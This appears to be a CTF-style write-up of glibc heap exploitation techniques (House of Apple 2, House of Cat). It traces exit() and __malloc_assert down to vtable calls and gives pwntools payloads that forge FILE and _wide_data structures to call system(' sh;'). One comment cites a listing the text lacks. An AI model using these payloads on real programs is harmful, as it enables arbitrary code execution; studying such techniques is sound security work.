How exit reaches the IO code

- exit.c/exit()

void exit (int status) { __run_exit_handlers (status, &__exit_funcs, true, true); } libc_hidden_def (exit)

- exit.c/__run_exit_handlers()

__libc_lock_unlock (__exit_funcs_lock); if (run_list_atexit) RUN_HOOK (__libc_atexit, ()); _exit (status);

- exit.c/RUN_HOOK (__libc_atexit, ()); __libc_atexit points to _IO_cleanup, so _IO_cleanup is called.

- genops.c/_IO_cleanup()

int _IO_cleanup (void) { int result = _IO_flush_all_lockp (0); _IO_unbuffer_all (); return result; }

- genops.c/_IO_flush_all_lockp()

for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain) { run_fp = fp; if (do_lock) _IO_flockfile (fp); if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) || (_IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)) ) && _IO_OVERFLOW (fp, EOF) == EOF) result = EOF; if (do_lock) _IO_funlockfile (fp); run_fp = NULL; }

_IO_OVERFLOW (fp, EOF) calls the overflow entry of fp's vtable. It is the last operand of the && chain in the if condition, so it only runs when one of the following holds:

- fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base

- _IO_vtable_offset (fp) == 0 && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)

The payload is therefore constructed as follows.

fake_io = flat({

0x0:b' sh;',

0x28:0x1,

0x88:heap_base+0x2000,

0xa0:fake_wide_data_addr,

0xd8:_IO_wfile_jumps,

},filler=b'\x00')

fake_wide_data = flat({

0x18: 0x0,

0x20: 0x1,

0x30: 0x0,

0xe0: fake_vtable_addr

},filler=b'\x00')

fake_vtable = flat({

0x68:system

},filler=b'\x00')

fake_io构造

- 0x28 设置

_IO_write_ptr为1,而_IO_write_base(0x20)为0,_mode(0xc0)为0,那么满足调用_IO_OVERFLOW的条件。 - 0xa0 为伪造的

fake_wide_data - 0xd8 为



_IO_wfile_jumps如图可以看到,当我们伪造vtable指向_IO_wfile_jumps时,exit调用_IO_OVERFLOW,相当于调用了_IO_wfile_overflow

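_IO_wfile_overflow calls _IO_wdoallocbuf when _IO_NO_WRITES and _IO_CURRENTLY_PUTTING are clear in _flags and _wide_data->_IO_write_base is NULL. The listing below is _IO_wfile_underflow_mmap, another function in the wide jump tables that reaches the same _IO_wdoallocbuf call: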

static wint_t

_IO_wfile_underflow_mmap (FILE *fp)

{

struct _IO_codecvt *cd;

const char *read_stop;

if (__glibc_unlikely (fp->_flags & _IO_NO_READS))

{

fp->_flags |= _IO_ERR_SEEN;

__set_errno (EBADF);

return WEOF;

}

if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)

return *fp->_wide_data->_IO_read_ptr;

cd = fp->_codecvt;

/* Maybe there is something left in the external buffer. */

if (fp->_IO_read_ptr >= fp->_IO_read_end

/* No. But maybe the read buffer is not fully set up. */

&& _IO_file_underflow_mmap (fp) == EOF)

/* Nothing available. _IO_file_underflow_mmap has set the EOF or error

flags as appropriate. */

return WEOF;

/* There is more in the external. Convert it. */

read_stop = (const char *) fp->_IO_read_ptr;

if (fp->_wide_data->_IO_buf_base == NULL)

{

/* Maybe we already have a push back pointer. */

if (fp->_wide_data->_IO_save_base != NULL)

{

free (fp->_wide_data->_IO_save_base);

fp->_flags &= ~_IO_IN_BACKUP;

}

_IO_wdoallocbuf (fp); /* execution needs to reach this call */

}

//......

}

- The conditions are:

- (fp->_flags & _IO_NO_READS) == 0

- fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end

- fp->_IO_read_ptr < fp->_IO_read_end

- fp->_wide_data->_IO_buf_base == NULL

- fp->_wide_data->_IO_save_base == NULL

- _IO_wdoallocbuf (fp) is then called.

void

_IO_wdoallocbuf (FILE *fp)

{

if (fp->_wide_data->_IO_buf_base)

return;

if (!(fp->_flags & _IO_UNBUFFERED))

if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF) /* call through the wide vtable (_IO_WXXXX macro) */

return;

_IO_wsetb (fp, fp->_wide_data->_shortbuf,

fp->_wide_data->_shortbuf + 1, 0);

}

libc_hidden_def (_IO_wdoallocbuf)

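- The conditions are:

- fp->_wide_data->_IO_buf_base == NULL (otherwise the function returns immediately)

- (fp->_flags & _IO_UNBUFFERED) == 0

_IO_WDOALLOCATE (fp) is *(fp->_wide_data->_wide_vtable + 0x68)(fp).

fp is passed as the first argument, so the bytes at offset 0x0 of the fake FILE become the argument of the called function, here system.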
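The conditions on the _IO_wfile_overflow path can be checked offline before sending a payload. The sketch below is a hypothetical helper, not part of pwntools; the flag constants are the values from glibc's libio.h, and the wide_data arguments stand for the fields at offsets 0x18 (_IO_write_base) and 0x30 (_IO_buf_base) of fake_wide_data.

```python
import struct

_IO_UNBUFFERED = 0x0002
_IO_NO_WRITES = 0x0008
_IO_CURRENTLY_PUTTING = 0x0800


def reaches_wdoallocate(flags_bytes, wide_write_base, wide_buf_base):
    """True if _IO_wfile_overflow -> _IO_wdoallocbuf -> _IO_WDOALLOCATE would be taken."""
    # _flags is a 32-bit little-endian int at offset 0x0 of the fake FILE.
    flags = struct.unpack("<I", flags_bytes[:4].ljust(4, b"\x00"))[0]
    return ((flags & _IO_NO_WRITES) == 0
            and (flags & _IO_CURRENTLY_PUTTING) == 0
            and wide_write_base == 0      # makes _IO_wfile_overflow call _IO_wdoallocbuf
            and wide_buf_base == 0        # keeps _IO_wdoallocbuf from returning early
            and (flags & _IO_UNBUFFERED) == 0)
```

`reaches_wdoallocate(b" sh;", 0, 0)` is true for the payload above: the leading space keeps the low flag bits clear, and the string still works as a shell command.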

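House of Cat analysis

__malloc_assert -> __fxprintf -> locked_vfxprintf -> __vfprintf_internal -> _IO_file_xsputn. Here _IO_file_xsputn is called through stderr's vtable, so stderr can be forged: with the vtable set to _IO_wfile_jumps + 0x10, the xsputn slot (0x38) resolves to the seekoff slot (0x48) and _IO_wfile_seekoff is called instead. From there the forged _wide_data and its wide vtable are used in the same way as in House of Apple 2.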

# Redirect stderr to fake_io

# Payload written directly into the heap chunk

heap_base = [address of fake_io]

system = libc.sym["system"]

fake_wide_data_addr = heap_base + 0xe0

fake_vtable_addr = heap_base + 0x1c8

_IO_wfile_jumps = libc.sym["_IO_wfile_jumps"]

fake_io = flat({

0x0:b' sh;',

0x28:0x1,

0x88:heap_base+0x2000,

0xa0:fake_wide_data_addr,

0xd8:_IO_wfile_jumps+0x10,

},filler=b'\x00')

fake_wide_data = flat({

0x18: 0x0,

0x20: 0x1,

0x30: 0x0,

0xe0: fake_vtable_addr,

},filler=b'\x00')

fake_vtable = flat({

0x18:system

},filler=b'\x00')
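The vtable shift used in this payload is plain offset arithmetic over the jump table. The sketch below lists the slots in the same order as the IO_jump_t listing earlier and assumes 8-byte entries; `slot_offset` and `resolved_slot` are hypothetical helper names.

```python
SLOTS = ["dummy", "dummy2", "finish", "overflow", "underflow", "uflow",
         "pbackfail", "xsputn", "xsgetn", "seekoff", "seekpos", "setbuf",
         "sync", "doallocate", "read", "write", "seek", "close", "stat",
         "showmanyc", "imbue"]


def slot_offset(name):
    """Byte offset of a slot inside a jump table with 8-byte entries."""
    return SLOTS.index(name) * 8


def resolved_slot(called, vtable_shift):
    """Slot that is actually reached when the vtable pointer is shifted by vtable_shift bytes."""
    return SLOTS[(slot_offset(called) + vtable_shift) // 8]
```

`resolved_slot("xsputn", 0x10)` gives "seekoff", which is why the payload stores _IO_wfile_jumps + 0x10, and `slot_offset("overflow")` gives 0x18, the offset where fake_vtable places system.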
